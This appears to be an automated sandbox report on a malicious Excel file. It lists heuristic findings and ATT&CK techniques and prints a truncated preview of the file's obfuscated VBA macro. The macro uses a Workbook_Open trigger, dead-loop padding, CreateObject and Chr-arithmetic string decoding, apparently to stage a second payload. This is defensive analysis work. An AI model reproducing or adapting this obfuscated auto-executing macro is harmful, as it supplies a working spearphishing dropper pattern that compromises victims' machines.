MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing a Workbook_Open VBA macro. This macro is heavily obfuscated and uses a CreateObject call, indicating it likely attempts to download and execute a second-stage payload. The presence of a Workbook_Open auto-execution event and obfuscated code strongly suggests a malicious intent, likely delivered via spearphishing.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13543 bytes |
SHA-256: 88441f0e41b0bc9f29ba954cd8f4dd730f85e132d99bd1c818e1af3c100f7cea |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
teNuAhp3wr.cuBOTk_Bt_x2GWUYaWU3
While 24 = 55
Dim Im_cG_ISHbm As Boolean
Wend
Dim EgHaMKDt_VOkvvS As Worksheet
While 17 = 52
Dim s_dplcV5yt As Boolean
Wend
Dim hGSZt2QZ6ui As Worksheet
While 27 = 50
Dim N3KOSk2vWWqT As Boolean
Wend
Dim pZSnvAWslRpoC As Worksheet
While 13 = 56
Dim sRNc8Iy_scE As Boolean
Wend
Dim QZQ1cGaU1vm9ZM As Worksheet
While 6 = 41
Dim eYhB75LfKiRl As Boolean
Wend
Dim RYM1T67LUTrfNc As Worksheet
While 27 = 43
Dim SwOERxObsO8v As Boolean
Wend
Dim g3uMrhzyBG9ap As Worksheet
While 7 = 35
Dim BL1IqBvbD2r5c9x As Boolean
Wend
Dim B6cjUIXSjF As Worksheet
While 1 = 41
Dim XmxKxwYOjWRA As Boolean
Wend
Dim MJRc_BQNhBv_mW As Worksheet
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "teNuAhp3wr"
Dim bPBuSgeImr1N_C1HR9pyUOyYXaz6TFCBPnj9tMCCh_cUBw_Eg3PiG_gKakV1phyeox7Ya1XD5lOTvcWjZtXZzb4KEWgG1KV_J7oLyimocKmdxKY8LuY6IW As String
Dim xYzKUL1f1gTUrZmEH5RVQ4fW4SZg9UVql1KgCPv_WjDJFD3B_HYBiix4 As String
Dim oOj4XP4_MRumrAtK83cCTwxXa1k951pRXwU1z7711xI77M1rGfQWAjk1ZKagn4IUkaN5n2U_6kJfmzZM931WiQQwJdYmeXK7nwUe95CNJPaXYDLjuMguCuvRHZsIbqdfXM1zd5NCzlLRz3W As String
Dim hrM7nA8eHbXIFdfWGLWUq_XmhigqQUYwL4GXAUdudqIotAqRjCBwfS_hRiWDbPLvCk6LUGUvqkz9ys2g2MFNRkP23i_a8YRMdVkHDd7bpOE4bAr As Integer
Function fm3PBqDWyNp3GCsLnmaVJz5SgxtXVzsgZr3lqFOSIwcMRGIJxxGZJA4pr(Pg6Nj9uS4S6EKIPlmg4AUj2NqP1lfFY_Idqnk_bVW5slXVS6UPKCYifooqfRGGvv355palAl_glY1NzT65PN5Uii8A84cHMNG6rbZlcsOh827E)
While 1 = 37
Dim jeVsn5Iy1WX1DL As Boolean
Wend
Dim jWUPExqzdjz15 As Worksheet
While 12 = 42
Dim YGoCzJS7RDpUZS As Boolean
Wend
Dim ggpTdCuMB_NLB9 As Worksheet
While 12 = 56
Dim tAu2v_tqKThosNQ As Boolean
Wend
Dim So5ndHQxOUw As Worksheet
Dim Io6v_1ltcjQ_21sh2LWTOKG_Pdt5QHXQhjNXam_QjBjUjtFLe4KWfqN7f1djEpaSJ_eQlSEMGEsLkucfVfYW7At1UQ1iGdK4jPJjNxjJw7OZ7ATuW8LhOCVHNm6TbfEl4ykTj2
While 16 = 37
Dim IK_nwlHTKQQwhZ As Boolean
Wend
Dim izUTuxSe5qSSh As Worksheet
While 24 = 47
Dim gyaKef9yhk As Boolean
Wend
Dim ff6eWC_B2VL5R6 As Worksheet
While 7 = 50
Dim bcfcnOVTcCkes_u As Boolean
Wend
Dim OhkANyxxQ5 As Worksheet
Dim WRjD4BrSkL3kFmQnIXhUDlVocKMKk_pKmzySUuz_RvgXf8UCZW9cjgat54iqweqjep8Pw7RWggCP_8GdzJuM_Lk_XDXZJHLvD63z__NbDj5Bd
While 3 = 55
Dim b4oa6TkferA9 As Boolean
Wend
Dim eJQMKC342R4Okwk As Worksheet
While 21 = 49
Dim DEnnMgKUq2fq9 As Boolean
Wend
Dim MVsPCYr_mt As Worksheet
While 7 = 49
Dim WCH9XzHsqbYC As Boolean
Wend
Dim Vt796fReJ53_ As Worksheet
While 5 = 31
Dim gfSsJJCa3rzdBUQ As Boolean
Wend
Dim BW8PewRVe_ZvcTN As Worksheet
While 4 = 37
Dim tbHDa2eXhfX As Boolean
Wend
Dim Hm4b6jMPFKmVPN As Worksheet
While 18 = 48
Dim HxnsWiFn8W As Boolean
Wend
Dim T73Xe9YtFzHsjk As Worksheet
Set WRjD4BrSkL3kFmQnIXhUDlVocKMKk_pKmzySUuz_RvgXf8UCZW9cjgat54iqweqjep8Pw7RWggCP_8GdzJuM_Lk_XDXZJHLvD63z__NbDj5Bd = CreateObject(xYzKUL1f1gTUrZmEH5RVQ4fW4SZg9UVql1KgCPv_WjDJFD3B_HYBiix4)
While 27 = 55
Dim cKNCFhxuwLsptx As Boolean
Wend
Dim GxydnfF9pxtGv3 As Worksheet
While 26 = 59
Dim OY_XLBNKTDfY As Boolean
Wend
Dim hiHpoyNjkQAn As Worksheet
While 12 = 49
Dim DDddeYQ9u5eW As Boolean
Wend
Dim FSbqi6ct8N7gy As Worksheet
bPBuSgeImr1N_C1HR9pyUOyYXaz6TFCBPnj9tMCCh_cUBw_Eg3PiG_gKakV1phyeox7Ya1XD5lOTvcWjZtXZzb4KEWgG1KV_J7oLyimocKmdxKY8LuY6IW = Chr(369 - 271) & Chr(295 - 190) & Chr(307 - 197) & Chr(246 - 200) & Chr(452 - 354) & Chr(404 - 307) & Chr(424 - 309) & Chr(261 - 160) & Chr(73 - 19) & Chr(179 - 127)
While 1 = 59
Dim G53KP7XZTGgto4u As Boolean
Wend
Dim fmmDuhUUf_o
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.